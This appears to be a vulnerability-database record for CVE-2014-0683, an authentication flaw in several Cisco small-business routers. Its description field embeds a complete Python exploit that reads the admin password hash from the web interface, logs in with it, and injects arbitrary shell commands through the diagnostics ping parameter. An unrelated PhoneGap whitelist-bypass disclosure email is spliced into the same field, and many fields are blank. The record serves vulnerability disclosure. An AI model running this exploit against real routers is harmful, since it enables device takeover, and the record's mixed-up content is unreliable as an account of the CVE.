ID

VAR-201403-0204

CVE

CVE-2014-0683

TITLE

plural Cisco Wireless-N VPN Vulnerabilities that can gain management access in product firmware

DESCRIPTION

The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute # Date: 2018-08 # Exploit Author: RySh # Vendor Homepage: https://www.cisco.com/ # Version: 1.1.0.9 # Tested on: RV110W 1.1.0.9 # CVE : CVE-2014-0683, CVE-2015-6396 import os import sys import re import urllib import urllib2 import getopt import json import ssl ssl._create_default_https_context = ssl._create_unverified_context ### # Usage: ./{script_name} 192.168.1.1 443 "reboot" ### if __name__ == "__main__": IP = argv[1] PORT = argv[2] CMD = argv[3] # Get session key, Just access index page. url = 'https://' + IP + ':' + PORT + '/' req = urllib2.Request(url) result = urllib2.urlopen(req) res = result.read() # parse 'admin_pwd'! -- Get credits admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd # Get session_id by POST req2 = urllib2.Request(url + "login.cgi") req2.add_header('Origin', url) req2.add_header('Upgrade-Insecure-Requests', 1) req2.add_header('Content-Type', 'application/x-www-form-urlencoded') req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req2.add_header('Referer', url) req2.add_header('Accept-Encoding', 'gzip, deflate') req2.add_header('Accept-Language', 'en-US,en;q=0.9') req2.add_header('Cookie', 'SessionID=') data = {"submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": "0", "change_action": "", "enc": "1", "user": admin_user, "pwd": admin_pwd, "sel_lang": "EN" } r = urllib2.urlopen(req2, urllib.urlencode(data)) resp = r.read() login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] # Execute your commands via diagnose command parameter, default command is `reboot` req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) req3.add_header('Origin', url) req3.add_header('Upgrade-Insecure-Requests', 1) req3.add_header('Content-Type', 'application/x-www-form-urlencoded') req3.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req3.add_header('Referer', url) req3.add_header('Accept-Encoding', 'gzip, deflate') req3.add_header('Accept-Language', 'en-US,en;q=0.9') req3.add_header('Cookie', 'SessionID=') data_cmd = {"submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "gui_action": "", "traceroute_ip": "", "commit": "1", "ping_times": "3 |" + CMD + "|", "ping_size": "64", "wait_time": "4", "ping_ip": "127.0.0.1", "lookup_name": "" } r = urllib2.urlopen(req3, urllib.urlencode(data_cmd)) . The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap. ############################################################################################## Dear PhoneGap contributors, PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper <http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf>. 1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects. 2. A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack. 3. PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\\.)?" + origin)); For example, if foo.com is whitelisted, foo.com.evil.com will pass the check. 4. PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using <script> tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin. 5. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages. We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know. Thanks, Martin, Suman, and Vitaly ##############################################################################################

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

trust management

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Gustavo Javier Speranza

SOURCES

LAST UPDATE DATE

2024-11-23T21:55:26.947000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE